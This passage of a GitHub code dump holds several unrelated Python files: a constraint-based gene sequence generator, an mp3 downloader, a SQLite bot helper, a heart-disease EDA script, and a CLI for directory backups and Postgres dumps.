if potential sequence satisfies all 'morethan()' constraints described by user.\"\"\"\n        variables = []\n        for arg in argv:\n            variables.append(arg)\n        parts = self.morethanParts\n        n = self.morethanValues\n        count = 0\n        for x in range(len(parts)):\n            if variables.count(parts[x]) > n[x]:\n                count += 1\n        if count == len(parts):\n            return True\n        else:\n            return False\n\n    def exactlyConstraint(self, *argv):\n        \"\"\"Returns True if potential sequence satisfies all 'exactly()' constraints described by user.\"\"\"\n        variables = []\n        for arg in argv:\n            variables.append(arg)\n        parts = self.exactlyParts\n        n = self.exactlyValues\n        count = 0\n        for x in range(len(parts)):\n            if variables.count(parts[x]) == n[x]:\n                count += 1\n        if count == len(parts):\n            return True\n        else:\n            return False\n\n    def thenConstraint(self, *argv):\n        \"\"\"Returns True if potential sequence satisfies all 'then()' constraints described by user.\"\"\"\n        variables = []\n        for arg in argv:\n            variables.append(arg)\n        partsA = self.thenPartsA\n        partsB = self.thenPartsB\n        count = 0\n        for x in range(len(partsA)):\n            if partsA[x] in variables:\n                if partsB[x] in variables:\n                    count += 1\n        if count == len(partsA):\n            return True\n        else:\n            return False\n\n    def withConstraint(self, *argv):\n        \"\"\"Returns True if potential sequence satisfies all 'witH()' constraints described by user.\"\"\"\n        variables = []\n        for arg in argv:\n            variables.append(arg)\n        partsA = self.witHPartsA\n        partsB = self.witHPartsB\n        count = 0\n        for x in range(len(partsA)):\n            if (partsA[x] in variables) and (partsB[x] in variables):\n                count += 1\n        if count == len(partsA):\n            return True\n        else:\n            return False\n\n    def startswithConstraint(self, *argv):\n        \"\"\"Returns True if potential sequence satisfies all 'startswith()' constraints described by user.\"\"\"\n        variables = []\n        for arg in argv:\n            variables.append(arg)\n        ruleList = list(self.rules[\"startswith\"].keys())\n        if len(ruleList) > 1:\n            print(\"startswith used on multiple parts\")\n            return False\n        if ruleList[0] in variables:\n            if variables[0] == ruleList[0]:\n                return True\n            else:\n                return False\n\n    def endswithConstraint(self, *argv):\n        \"\"\"Returns True if potential sequence satisfies all 'endswith()' constraints described by user.\"\"\"\n        variables = []\n        for arg in argv:\n            variables.append(arg)\n        ruleList = list(self.rules[\"endswith\"].keys())\n        if len(ruleList) > 1:\n            print(\"endswith used on multiple parts\")\n            return False\n        if ruleList[0] in variables:\n            if variables[len(variables)-1] == ruleList[0]:\n                return True\n            else:\n                return False\n\n    def all_afterConstraint(self, *argv):\n        \"\"\"Returns True if potential sequence satisfies all 'all_after()' constraints described by user.\"\"\"\n        variables = []\n        for arg in argv:\n            variables.append(arg)\n        partsA = list(self.rules[\"all_after\"].keys())\n        partsB = list(self.rules[\"all_after\"].values())\n        firstA = None\n        lastB = None\n        for x in range(len(variables)):\n            done = False\n            for i in range(len(partsA)):\n                if partsA[i] == variables[x]:\n                    firstA = x\n                    done = True\n                    break\n            if done:\n                break\n\n        for x in range(len(variables)):\n            for i in range(len(partsB)):\n                if partsB[i] == variables[x]:\n                    lastB = x\n        if lastB < firstA:\n            return True\n        else:\n            return False\n\n    def some_afterConstraint(self, *argv):\n        \"\"\"Returns True if potential sequence satisfies all 'some_after()' constraints described by user.\"\"\"\n        variables = []\n        for arg in argv:\n            variables.append(arg)\n        partsA = list(self.rules[\"some_after\"].keys())\n        partsB = 
list(self.rules[\"some_after\"].values())\n foundA = []\n foundB = []\n for x in range(len(variables)):\n if variables[x] in partsA:\n foundA.append(x)\n if variables[x] in partsB:\n foundB.append(x)\n for a in foundA:\n for b in foundB:\n if b < a:\n return True\n return False\n\n def all_beforeConstraint(self, *argv):\n \"\"\"Returns True if potential sequence satifies all 'all_before()' constraints desribed by user.\"\"\"\n variables = []\n for arg in argv:\n variables.append(arg)\n partsA = list(self.rules[\"all_before\"].keys())\n partsB = list(self.rules[\"all_before\"].values())\n firstB = None\n lastA = None\n for x in range(len(variables)):\n done = False\n for i in range(len(partsB)):\n if partsB[i] == variables[x]:\n firstB = x\n done = True\n break\n if done:\n break\n\n for x in range(len(variables)):\n for i in range(len(partsA)):\n if partsA[i] == variables[x]:\n lastA = x\n if lastA < firstB:\n return True\n else:\n return False\n\n def some_beforeConstraint(self, *argv):\n \"\"\"Returns True if potential sequence satifies all 'some_before()' constraints desribed by user.\"\"\"\n variables = []\n for arg in argv:\n variables.append(arg)\n partsA = list(self.rules[\"some_before\"].keys())\n partsB = list(self.rules[\"some_before\"].values())\n foundA = []\n foundB = []\n for x in range(len(variables)):\n if variables[x] in partsA:\n foundA.append(x)\n if variables[x] in partsB:\n foundB.append(x)\n for a in foundA:\n for b in foundB:\n if a < b:\n return True\n return False\n\n def generate(self, number=0):\n \"\"\"Return all sequences that satifies user described constraints. If not given a number for sequences method returns all solutions.\"\"\"\n # Create domain for each position in sequence using Counting rules\n self.containsParts = list(self.rules[\"contains\"].keys())\n self.morethanParts = list(self.rules[\"morethan\"].keys())\n self.morethanValues = list(self.rules[\"morethan\"].values())\n self.exactlyParts = list(self.rules[\"exactly\"].keys())\n self.exactlyValues = list(self.rules[\"exactly\"].values())\n self.thenPartsA = list(self.rules[\"then\"].keys())\n self.thenPartsB = list(self.rules[\"then\"].values())\n self.witHPartsA = list(self.rules[\"witH\"].keys())\n self.witHPartsB = list(self.rules[\"witH\"].values())\n domain = self.morethanParts + self.containsParts + self.exactlyParts + self.thenPartsA + self.thenPartsB + self.witHPartsA + self.witHPartsB\n self.problem.addVariables(range(self.length), domain)\n\n # If certain rule was implemented by user, then apply to solver\n if self.rules[\"contains\"]:\n self.problem.addConstraint(self.containsConstraint, list(range(self.length)))\n if self.rules[\"morethan\"]:\n self.problem.addConstraint(self.morethanConstraint, list(range(self.length)))\n if self.rules[\"exactly\"]:\n self.problem.addConstraint(self.exactlyConstraint, list(range(self.length)))\n if self.rules[\"then\"]:\n self.problem.addConstraint(self.thenConstraint, list(range(self.length)))\n if self.rules[\"witH\"]:\n self.problem.addConstraint(self.withConstraint, list(range(self.length)))\n if self.rules[\"startswith\"]:\n self.problem.addConstraint(self.startswithConstraint, list(range(self.length)))\n if self.rules[\"endswith\"]:\n self.problem.addConstraint(self.endswithConstraint, list(range(self.length)))\n if self.rules[\"all_after\"]:\n self.problem.addConstraint(self.all_afterConstraint, list(range(self.length)))\n if self.rules[\"some_after\"]:\n self.problem.addConstraint(self.some_afterConstraint, list(range(self.length)))\n if 
self.rules[\"all_before\"]:\n self.problem.addConstraint(self.all_beforeConstraint, list(range(self.length)))\n if self.rules[\"some_before\"]:\n self.problem.addConstraint(self.some_beforeConstraint, list(range(self.length)))\n\n # Return solutions\n if number == 0:\n self.solutions = self.problem.getSolutions()\n return self.solutions\n # Generate one solution\n if number == 1:\n # Use MinConflictsSolver to quickly generate single solution\n solver = MinConflictsSolver()\n self.problem.setSolver(solver)\n while self.solutions == None:\n self.solutions = self.problem.getSolution()\n return self.solutions\n # Generate user defined number of solutions using default backtracking solver\n else:\n self.solutions = self.problem.getSolutions()\n return self.solutions[0:number]\n\n # Write generated solutions to JSON file, stored in Solutions directory\n def solutionsToFile(self, filename, number=0):\n \"\"\"Write generated solutions to json file. If not given a number all solutions are written to the file\"\"\"\n fileCheck = os.path.splitext(filename)\n if fileCheck[1] != \".json\":\n raise Exception(\"Filename must be of type json\")\n path = \"./Solutions/\" + filename\n\n f = open(path, \"w\")\n if number == 0:\n json.dump(self.solutions, f)\n f.close()\n else:\n json.dump(self.solutions[0:number], f)\n f.close()\n\n # Write declared rules to JSON file, stored in Rules directory\n def rulesToFile(self, filename):\n \"\"\"Write rules to json file.\"\"\"\n fileCheck = os.path.splitext(filename)\n if fileCheck[1] != \".json\":\n raise Exception(\"Filename must be of type json\")\n path = \"./Rules/\" + filename\n\n f = open(path, \"w\")\n json.dump(self.rules, f)\n f.close()\n","repo_name":"hkim42/GenePy","sub_path":"Code/genepy/genepy.py","file_name":"genepy.py","file_ext":"py","file_size_in_byte":15931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70800228589","text":"import os\n\nimport requests\nfrom tqdm import tqdm\n\n\ndef download_mp3_files(urls, download_dir):\n \"\"\"\n Downloads mp3 files from a url list\n \"\"\"\n with requests.Session() as request:\n for url in urls:\n name = url.split('.mp3')[0].split('/')[-1]\n response = request.get(url, stream=True)\n\n total_size_in_bytes = int(response.headers.get('content-length', 0))\n block_size = 1024\n progress_bar = tqdm(total=total_size_in_bytes, unit='iB', unit_scale=True, colour='blue')\n\n if response.status_code == 200:\n path = os.path.join(download_dir, name + '.mp3')\n with open(path, 'wb') as file:\n for data in response.iter_content(block_size):\n progress_bar.update(len(data))\n file.write(data)\n\n progress_bar.close()\n\n if total_size_in_bytes != 0 and progress_bar.n != total_size_in_bytes:\n print('Something went wrong!')\n","repo_name":"sitek94/download-mp3s-with-python","sub_path":"download_mp3_files.py","file_name":"download_mp3_files.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30669912082","text":"from dataclasses import make_dataclass,dataclass\nimport sqlite3 as sql\n\nclass InfoClass:\n \"\"\"Класс с информацией из базы данных экземпляра класса Bot (self.info) \n \"\"\"\n def __get_tables_with_column(self):\n \n \n # INSERT INTO UserGroups (UserID) VALUES (435170678);\n \n data = {}\n \n # Названия всех таблиц\n self.cursor.execute(\"SELECT name FROM sqlite_master WHERE type='table';\")\n tables = tuple([i[0] for i in 
self.cursor.fetchall()])\n \n # Iterate over the tables and check whether the desired column is present\n for table_name in tables:\n self.cursor.execute(f\"PRAGMA table_info({table_name});\")\n columns_name = tuple([column[1] for column in self.cursor.fetchall()])\n \n \n \n if 'UserID' in columns_name:\n self.cursor.execute(f'''SELECT * FROM {table_name} WHERE UserID = {self.ID} ''')\n columns_data = self.cursor.fetchall()\n if len(columns_data) != 0:\n columns_data = columns_data[0]\n elif len(columns_data) == 0 : \n columns_data = [None for _ in range(len(columns_name))]\n \n for cn,cd in zip(columns_name,columns_data):\n data[cn] = cd\n \n return data\n \n def __init__(self, database : str, ID : int) -> None:\n self.ID = ID\n # self.database = database.connection\n self.database = sql.connect(database)\n self.cursor = self.database.cursor()\n self.TABLES = self.__get_tables_with_column()\n \n def GetData(self) -> dataclass:\n db_dataclass = make_dataclass(\"Database\", self.__get_tables_with_column().keys())\n return db_dataclass(**self.__get_tables_with_column())\n","repo_name":"QuoNaro/kgtt-bot","sub_path":"src/kgtt_bot/vk/infoclass.py","file_name":"infoclass.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73884823148","text":"#https://www.kaggle.com/fabijanbajo/heart-disease-prediction\r\n\r\n#!/usr/bin/env python\r\n# coding: utf-8\r\n\r\n# In[1]:\r\n\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nplt.style.use('ggplot')\r\n#get_ipython().run_line_magic('matplotlib', 'inline')\r\n\r\n\r\n# In[2]:\r\n\r\n\r\n#import dataset while naming columns\r\ncols = ['age','sex','cp','trestbps','chol','fbs','restecg','thalach','exang','oldpeak','slope','ca','thal','num']\r\nurl=\"C:/Users/venkat/Desktop/ufa/coursework/sem-2/Dr Beth/knn_clustering/HeartDisease_Cleaveland - Copy.csv\"\r\ndf = pd.read_csv(url, index_col=False, names=cols, header=None)\r\n\r\n\r\n# In[3]:\r\n\r\n\r\ndf.head()\r\n\r\n\r\n# In[4]:\r\n\r\n\r\ndf.describe()\r\n\r\n\r\n# In[5]:\r\n\r\n\r\ndf.info()\r\n\r\n\r\n# In[7]:\r\n\r\n\r\n#investigate object datatypes\r\nprint(df['ca'].unique())\r\nprint(df['thal'].unique())\r\n\r\n\r\n# In[9]:\r\n\r\n\r\n#replace '?' 
with 'np.nan' for now to avoid errors in eda\r\n#cast dtypes as float\r\ndef clean(x):\r\n if x.strip() == '?':\r\n return np.nan\r\n else:\r\n return x\r\n\r\ndf['ca'] = df['ca'].apply(clean).astype('float64')\r\ndf['thal'] = df['thal'].apply(clean).astype('float64')\r\nprint(df['ca'].unique())\r\nprint(df['thal'].unique())\r\n\r\n\r\n# In[10]:\r\n\r\n\r\ndf.info()\r\n\r\n\r\n# In[12]:\r\n\r\n\r\ndf.dropna(inplace=True)\r\nprint(df.shape)\r\n\r\n\r\n# In[14]:\r\n\r\n\r\nfor col in df.columns.tolist():\r\n print(col, len(df[col].unique()))\r\n\r\n\r\n# In[17]:\r\n\r\n\r\n#separate categorical variables from continuous\r\ncat_var = [col for col in df.columns.tolist() if len(df[col].unique()) <=5]\r\nprint(len(cat_var))\r\ncont_var = [col for col in df.columns.tolist() if len(df[col].unique()) > 5]\r\nprint(len(cont_var))\r\n\r\n\r\n# In[18]:\r\n\r\n\r\n#explore distributions of continuous variables\r\nfig, axes = plt.subplots(3,2, figsize=(12,10))\r\nfor i, ax in enumerate(axes.flatten()):\r\n if i >= len(cont_var):\r\n # hide any axes beyond the number of continuous columns\r\n ax.axis('off')\r\n continue\r\n column_name = cont_var[i]\r\n ax.hist(df[column_name])\r\n ax.set_title(column_name)\r\n\r\nplt.tight_layout()\r\n\r\n\r\n# In[19]:\r\n\r\n\r\nfig, axes = plt.subplots(2, 5, figsize=(12,10))\r\nfor i, ax in enumerate(axes.flatten()):\r\n if i >= len(cat_var):\r\n # hide any axes beyond the number of categorical columns\r\n ax.axis('off')\r\n continue\r\n column_name = cat_var[i]\r\n ax.hist(df[column_name])\r\n ax.set_title(column_name)\r\n\r\nplt.tight_layout()\r\n\r\n\r\n# In[20]:\r\n\r\n\r\n#closer look at predictor column for class imbalance\r\nfloat(df[df['num'] > 0].shape[0]) / df['num'].shape[0]\r\n\r\n\r\n# In[21]:\r\n\r\n\r\ndf.head()\r\n\r\n\r\n# In[22]:\r\n\r\n\r\nfig, (ax1, ax2) = plt.subplots(1,2, figsize=(8, 4))\r\nax1.hist(df['num'])\r\nax1.set_title('Predictor Column')\r\n\r\n#change predictor ('num') col to boolean\r\ndf['num'] = df['num'] > 0\r\ndf['num'] = df['num'].map({False: 0, True: 1})\r\n\r\nax2.hist(df['num'])\r\nax2.set_title('Predictor Column Cleaned')\r\nplt.xticks([0,1], ['No Heart Disease', 'Heart Disease'])\r\nplt.tight_layout()\r\nplt.savefig('predictor_column.png')\r\n\r\n\r\n# In[23]:\r\n\r\n\r\n#covariance matrix for looking into dimensionality reduction\r\nfrom sklearn.preprocessing import scale\r\ncdf = df.copy()\r\ncdf.pop('num')\r\ncdf = pd.DataFrame(scale(cdf.values), columns=cdf.columns.tolist())\r\ncdf.cov()\r\n\r\n\r\n# In[25]:\r\n\r\n\r\n#identify higher correlation values\r\nfor col in cdf.columns.tolist():\r\n mask = cdf.cov()[col].argsort()\r\n print(col, cdf.cov()[col][mask][-2])\r\nmask = cdf.cov() > 0.3\r\nmask\r\n\r\n\r\n# In[26]:\r\n\r\n\r\ndf.corr()\r\n\r\n\r\n# In[ ]:\r\n\r\n\r\n\r\n\r\n","repo_name":"gigya74/python","sub_path":"eda.py","file_name":"eda.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70752401386","text":"import click\nimport datetime\nimport pathlib\nimport pydoni\nimport shutil\nimport subprocess\nimport termtables as tt\nimport time\nfrom .common import Verbose\nfrom os import makedirs, stat, mkdir, rmdir\nfrom os.path import basename, dirname, isfile, isdir, getmtime, join, getctime, expanduser\nfrom send2trash import send2trash\n\n\n@click.option('--table-schema', type=str, default='pydonicli',\n help='Postgres directory backup table schema name.')\n@click.option('--table-name', type=str, default='directory_backup',\n help='Postgres directory backup table name.')\n@click.option('--source', type=str,\n help='Source directory path.')\n@click.option('--source-size-bytes', type=int, default=None,\n help='Size of source directory in 
bytes.')\n@click.option('--target', type=str,\n help='Target directory path.')\n@click.option('--target-size-before-bytes', default=None, type=int,\n help='Size of target directory before backup in bytes.')\n@click.option('--target-size-after-bytes', default=None, type=int,\n help='Size of target directory after backup in bytes.')\n@click.option('--start-ts', type=float, default=None,\n help='UNIX timestamp of backup start time (output of `time.time()`).')\n@click.option('--end-ts', type=float, default=None,\n help='UNIX timestamp of backup end time (output of `time.time()`).')\n@click.option('--is-completed', type=bool, default=True,\n help='Boolean flag to indicate whether backup was completed successfully.')\n@click.option('-v', '--verbose', is_flag=True, default=False,\n help='Print program messages to console.')\n@click.command()\ndef append_backup_log_table(table_schema,\n table_name,\n source,\n source_size_bytes,\n target,\n target_size_before_bytes,\n target_size_after_bytes,\n start_ts,\n end_ts,\n is_completed,\n verbose):\n \"\"\"\n Append a record to the directory backup Postgres table. To be used when a backup is\n carried out without the `pydoni data backup` command (which handles the table insert\n automatically) but should still be recorded in the log table.\n \"\"\"\n args, result = pydoni.__pydonicli_declare_args__(locals()), dict()\n\n vb = Verbose(verbose)\n pg = pydoni.Postgres()\n\n sql_value_dct = dict(source=source,\n source_size_bytes=source_size_bytes,\n target=target,\n target_size_before_bytes=target_size_before_bytes,\n target_size_after_bytes=target_size_after_bytes,\n start_ts=datetime.datetime.fromtimestamp(start_ts),\n end_ts=datetime.datetime.fromtimestamp(end_ts),\n is_completed=is_completed)\n\n vb.info(f'table_schema: {table_schema}')\n vb.info(f'table_name: {table_name}')\n for k, v in sql_value_dct.items():\n vb.info(f'{k}: {v}')\n\n insert_sql = pg.build_insert(schema_name=table_schema,\n table_name=table_name,\n columns=[k for k, v in sql_value_dct.items()],\n values=[v for k, v in sql_value_dct.items()])\n\n pg.execute(insert_sql)\n\n vb.info(f'Appended record to {table_schema}.{table_name}')\n result['sql_value_dct'] = sql_value_dct\n\n vb.program_complete('Append to backup log table complete')\n\n pydoni.__pydonicli_register__(dict(args=args, result=result, command_name='data.append_backup_log_table'))\n\n\ndef is_file_changed(sourcefile, targetfile):\n \"\"\"\n Detect whether a target file has been changed from its corresponding source file\n by determining whether the source and target file change datetimes are different\n by more than a threshold value (i.e. 
1%).\n \"\"\"\n def pct_change(num1, num2):\n \"\"\"\n Return the percentage change from `num1` -> `num2` on a scale from 0-100.\n \"\"\"\n return abs(100.0 * (num2 * 1.0 - num1 * 1.0) / (num1 * 1.0))\n\n mtime_source = getmtime(sourcefile)\n mtime_target = getmtime(targetfile)\n\n return pct_change(mtime_source, mtime_target) > 1.0\n\n@click.option('--source', type=click.Path(exists=True), required=True,\n help='Absolute path to source directory.')\n@click.option('--target', type=click.Path(exists=True), required=True,\n help='Absolute path to target directory.')\n@click.option('--update-log-table', is_flag=True, default=False,\n help='Add an entry to Postgres table pydonicli.directory_backup')\n@click.option('--use-rsync', is_flag=True, default=False,\n help='Use the `rsync` executable instead of python to back up source to target.')\n@click.option('-v', '--verbose', is_flag=True, default=False,\n help='Print messages to console.')\n@click.option('--debug', is_flag=True, default=False,\n help='Print debug messages to console.')\n@click.option('--dry-run', is_flag=True, default=False,\n help='Do not execute copy, replace or delete on any files.')\n@click.command()\ndef backup(source, target, update_log_table, use_rsync, verbose, debug, dry_run):\n \"\"\"\n Back up a source directory to a target directory.\n\n This function accepts a source and a target directory, most often\n on separate external hard drives, and copies all files from the source\n to the target that are either:\n\n (1) Not in the target directory\n (2) In the target directory, but have been updated\n\n Files in the target that have been deleted in the source will also be deleted.\n \"\"\"\n args, result = pydoni.__pydonicli_declare_args__(locals()), dict()\n\n start_ts = time.time()\n vb = Verbose(verbose=verbose, debug=debug)\n ws = ' '\n\n ignore_files = [\n 'The Office S09E16 Moving On.mkv',\n 'The Office S09E20 Paper Airplanes.mkv',\n ]\n\n if update_log_table:\n start_ts_utc = datetime.datetime.utcnow()\n pg = pydoni.Postgres()\n directory_backup_table_schema = 'pydonicli'\n directory_backup_table_name = 'directory_backup'\n\n insert_dict = dict(source=source,\n source_size_bytes=stat(source).st_size,\n target=target,\n target_size_before_bytes=stat(target).st_size,\n target_size_after_bytes=None,\n start_ts=start_ts_utc,\n is_completed=False)\n\n insert_sql = pg.build_insert(schema_name=directory_backup_table_schema,\n table_name=directory_backup_table_name,\n columns=list(insert_dict.keys()),\n values=list(insert_dict.values()),\n validate=True)\n if not dry_run:\n pg.execute(insert_sql)\n\n directory_backup_id = pg.read_sql(f\"\"\"\n select directory_backup_id\n from {directory_backup_table_schema}.{directory_backup_table_name}\n order by gen_ts desc\n limit 1\"\"\").squeeze()\n\n\n assert source != target, 'Source and target directories must be different'\n\n if use_rsync:\n cmd_lst = ['rsync', '--delete-before', '-a', '-h', '-u']\n if verbose:\n cmd_lst = cmd_lst + ['-v', '--progress']\n\n cmd_lst = cmd_lst + [f'\"{source}\"'] + [f'\"{target}\"']\n cmd = ' '.join(cmd_lst)\n\n subprocess.call(cmd, shell=True)\n\n # progress_flag = ' --progress' if verbose else ''\n # backup_cmd = f'rsync -avhu{progress_flag} --delete-before \"{source}\" \"{target}\"'\n # subprocess.call(backup_cmd, shell=True)\n\n else:\n vb.info(f'Listing files at source: {source}')\n files_source = pydoni.listfiles(path=source, recursive=True, full_names=True)\n vb.debug('Found files at source: ' + str(len(files_source)))\n files_source = [x for x 
in files_source if x not in ignore_files]\n vb.debug(f'Found files at source after filtering out manually ignored files: {len(files_source)}')\n\n vb.info(f'Listing files at target: {target}')\n files_target = pydoni.listfiles(path=target, recursive=True, full_names=True)\n vb.debug('Found files at target: ' + str(len(files_target)))\n files_target = [x for x in files_target if x not in ignore_files]\n vb.debug(f'Found files at target after filtering out manually ignored files: {len(files_target)}')\n\n # Scan source files and for each determine whether to do nothing, copy to target,\n # or replace at target\n copied_files = []\n replaced_files = []\n vb.info('Scanning for new, updated or deleted files at source')\n vb.pbar_init(total=len(files_source), unit='file')\n\n for sourcefile in files_source:\n vb.pbar_write(f'Sourcefile: {sourcefile}', refer_debug=True)\n vb.pbar.set_postfix({'file': basename(sourcefile)})\n\n targetfile = sourcefile.replace(source, target)\n vb.pbar_write(f'{ws}Expected mirrored targetfile: {targetfile}', refer_debug=True)\n\n if not isfile(targetfile):\n # Copy file to target. Create parent directory at target if it does not exist\n vb.pbar_write(f'{ws}(Copy) attempting to copy file \"{sourcefile}\" to \"{targetfile}\"', refer_debug=True)\n\n targetdpath = dirname(targetfile)\n if not isdir(targetdpath):\n vb.pbar_write(f'{ws}{ws}Parent directory of targetfile does not exist, creating it at: ' + targetdpath, refer_debug=True)\n if not dry_run:\n makedirs(targetdpath)\n\n vb.pbar_write(f'{ws}{ws}Successful', refer_debug=True)\n\n if not dry_run:\n shutil.copy2(sourcefile, targetfile)\n\n vb.pbar_write(f'{ws}Successful', refer_debug=True)\n copied_files.append(sourcefile)\n\n elif isfile(targetfile) and is_file_changed(sourcefile, targetfile):\n # Replace file at target (same action as copy, but parent directory must exist)\n vb.pbar_write(f'(Replace) attempting to copy file \"{sourcefile}\" to \"{targetfile}\"', refer_debug=True)\n if not dry_run:\n shutil.copy2(sourcefile, targetfile)\n\n vb.pbar_write(f'Successful', refer_debug=True)\n replaced_files.append(sourcefile)\n\n else:\n vb.pbar_write(f'{ws}Targetfile already exists and is unchanged', refer_debug=True)\n\n vb.pbar_update(1)\n\n vb.pbar_close()\n\n # Scan target files and for each determine whether that file has since been\n # deleted from source\n deleted_files = []\n vb.info('Scanning for files at target since deleted from source')\n vb.pbar_init(total=len(files_target))\n for targetfile in files_target:\n sourcefile = targetfile.replace(target, source)\n vb.pbar.set_postfix({'file': basename(targetfile)})\n\n if not isfile(sourcefile) and not isdir(sourcefile):\n vb.pbar_write(f'(Delete) attempting to delete \"{targetfile}\"', refer_debug=True)\n if not dry_run:\n send2trash(targetfile)\n\n vb.pbar_write(f'{ws}Successful', refer_debug=True)\n deleted_files.append(targetfile)\n\n vb.pbar_update(1)\n\n vb.pbar_close()\n\n # Record number of files copied, replaced and deleted\n vb.info(f'Copied {len(copied_files)} files')\n vb.info(f'Replaced {len(replaced_files)} files')\n vb.info(f'Deleted {len(deleted_files)} files')\n vb.info(f'Unchanged {len(files_source) - len(copied_files) - len(replaced_files) - len(deleted_files)} files')\n result = dict(copied=len(copied_files),\n replaced=len(replaced_files),\n deleted=len(deleted_files),\n unchanged=len(files_source) - len(copied_files) - len(replaced_files) - len(deleted_files))\n\n if update_log_table:\n vb.debug('Attempting to update log table with 
results...')\n\n update_dict = dict(target_size_after_bytes=pydoni.dirsize(target),\n end_ts=datetime.datetime.utcnow(),\n is_completed=True)\n\n update_sql = pg.build_update(schema_name=directory_backup_table_schema,\n table_name=directory_backup_table_name,\n pkey_name='directory_backup_id',\n pkey_value=directory_backup_id,\n columns=list(update_dict.keys()),\n values=list(update_dict.values()),\n validate=True)\n\n if not dry_run:\n pg.execute(update_sql)\n\n vb.debug(f'{ws}Successful')\n\n vb.program_complete('Backup complete', start_ts=start_ts)\n pydoni.__pydonicli_register__(dict(args=args, result=result, command_name='data.backup'))\n\n\n@click.option('--backup-dir', type=click.Path(exists=True), required=True,\n help='Path to directory to save database dump to.')\n@click.option('--db-name', type=str, default=None,\n help='Name of local Postgres database to dump.')\n@click.option('--pg-user', type=str, default=None,\n help='Username for Postgres.')\n@click.option('--sep', type=str, default='\\x08',\n help='Separator for local CSV dump. Requires that `csvdump` is True.')\n@click.option('--pgdump', is_flag=True, default=True,\n help='Dump database using `pgdump` utility.')\n@click.option('--csvdump', is_flag=True, default=False,\n help='Dump database as CSV files.')\n@click.option('--max-dir-size', type=float, default=None, required=False,\n help=pydoni.advanced_strip(\"\"\"Maximum backup directory size in GB. If\n specified, after the dump is complete, check if the total directory\n size of `backup_dir` is above this limit. If so, begin by removing the\n oldest backups and re-checking until the size is under the specified\n GB limit.\"\"\"))\n@click.option('--dry-run', is_flag=True, default=False,\n help='Do not execute dump but still run through program.')\n@click.option('-v', '--verbose', is_flag=True, default=False,\n help='Print messages to console.')\n@click.command()\ndef pg_dump(backup_dir,\n db_name,\n pg_user,\n sep,\n pgdump,\n csvdump,\n max_dir_size,\n dry_run,\n verbose):\n \"\"\"\n Dump a local Postgres database. Looks for ~/.pgpass by default.\n \"\"\"\n args, result = pydoni.__pydonicli_declare_args__(locals()), dict()\n\n vb = Verbose(verbose)\n\n if dry_run:\n vb.info('Not executing any code (dry run)')\n\n if pg_user is not None and db_name is not None:\n pg = pydoni.Postgres(pg_user=pg_user, db_name=db_name)\n else:\n # Attempt to parse ~/.pgpass file. 
Fail if this file does not exist or is not\n # able to be parsed\n pg = pydoni.Postgres()\n\n # Define subfolder to dump files to within dump directory\n subdir = pydoni.systime(compact=True) + '_' + pg.db_name\n backup_subdir = join(expanduser(backup_dir), subdir)\n mkdir(backup_subdir)\n\n vb.info('Database: ' + pg.db_name)\n vb.info('Destination folder: ' + backup_subdir)\n\n # Dump database based on user's preference\n # May dump using pg_dump, export tables to CSV, or both\n\n dumped_files = []\n\n if pgdump:\n vb.info('Executing `pg_dump`')\n if not dry_run:\n dumped_dbfile = pg.dump(backup_dir=backup_subdir)\n dumped_files += [dumped_dbfile]\n\n if csvdump:\n # Dump each file to textfile\n vb.info('Executing CSV dump to tables')\n if not dry_run:\n dumped_csvfiles = pg.dump_tables(backup_dir=backup_subdir, sep=sep, coerce_csv=False)\n dumped_files += dumped_csvfiles\n\n result['backup_directory'] = backup_subdir\n result['dumped_files'] = {}\n for f in dumped_files:\n result['dumped_files'][basename(f)] = dict(\n filesize=stat(f).st_size,\n filesize_readable=pydoni.human_filesize(stat(f).st_size),\n created=datetime.datetime.fromtimestamp(getctime(f)).strftime('%Y-%m-%d %H:%M:%S.%f'),\n rows=pydoni.textfile_len(f))\n\n if verbose:\n vb.line_break()\n tt_list = [[basename(file),\n infodict['created'],\n pydoni.human_filesize(infodict['filesize']),\n str(infodict['rows'])\n ] for file, infodict in result['dumped_files'].items()]\n\n if len(tt_list):\n if verbose:\n print(tt.to_string(\n tt_list,\n header=[click.style(x, bold=True) for x in ['File', 'Created', 'Size', 'Rows']],\n style=tt.styles.ascii_thin_double,\n padding=(0, 1),\n alignment='ccrr'))\n else:\n vb.warn('No database files were dumped!')\n\n if dry_run:\n rmdir(backup_subdir)\n\n max_dir_size_enforced = False\n removed_old_backup_dirs = []\n if max_dir_size:\n # Check size of `backup_dir` and clear any backup directories until the total size\n # is less than max_dir_size (upper GB limit)\n subdirs = sorted([x for x in pathlib.Path(backup_dir).iterdir() if isdir(x)], key=getmtime)\n subdirs_size = zip(subdirs, [pydoni.dirsize(x) / 1e9 for x in subdirs])\n total_size = sum([y for x, y in subdirs_size])\n\n if total_size > max_dir_size:\n vb.warn(f'Enforcing maximum directory size: {str(max_dir_size)} GB')\n max_dir_size_enforced = True\n\n while total_size > max_dir_size:\n dir_to_remove = str(subdirs[0])\n shutil.rmtree(dir_to_remove)\n removed_old_backup_dirs.append(dir_to_remove)\n\n subdirs = sorted([x for x in pathlib.Path(backup_dir).iterdir() if isdir(x)], key=getmtime)\n\n subdirs_size = zip(subdirs, [pydoni.dirsize(x) / 1e9 for x in subdirs])\n total_size = sum([y for x, y in subdirs_size])\n\n vb.warn(f'Removed \"{basename(dir_to_remove)}\"')\n\n vb.program_complete('Postgres dump complete')\n\n result['max_dir_size_enforced'] = max_dir_size_enforced\n result['removed_old_backup_dirs'] = [basename(x) for x in removed_old_backup_dirs]\n\n pydoni.__pydonicli_register__(dict(args=args, result=result, command_name='data.pg_dump'))\n\n\n@click.group(name='data')\ndef cli_data():\n \"\"\"Doni data-based CLI tools.\"\"\"\n pass\n\n\ncli_data.add_command(backup)\ncli_data.add_command(pg_dump)\ncli_data.add_command(append_backup_log_table)\n","repo_name":"tsouchlarakis/pydoni","sub_path":"pydoni/cli/commands/cli_data.py","file_name":"cli_data.py","file_ext":"py","file_size_in_byte":19153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
